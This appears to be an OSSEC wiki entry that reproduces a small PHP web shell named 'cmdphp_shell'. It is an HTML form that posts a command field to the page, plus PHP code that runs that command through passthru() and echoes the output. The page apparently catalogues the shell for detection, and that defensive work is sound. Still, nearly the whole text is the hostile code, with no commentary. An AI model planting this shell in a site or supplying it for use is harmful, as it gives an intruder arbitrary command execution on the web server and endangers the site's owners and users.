From OSSEC Wiki
cmdphp_shell
<b>#</b>php shell: <br>
<FORM name=injection METHOD=POST ACTION="<?php echo $_SERVER["REQUEST_URI"];?>">
cmd :
<INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>" size=50>
<br>
<INPUT TYPE="submit">
</FORM>
<hr color=777777 width=100% height=115px>
</font>
<pre>
$cmd = $_POST['cmd'];
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo htmlspecialchars($output);
exit;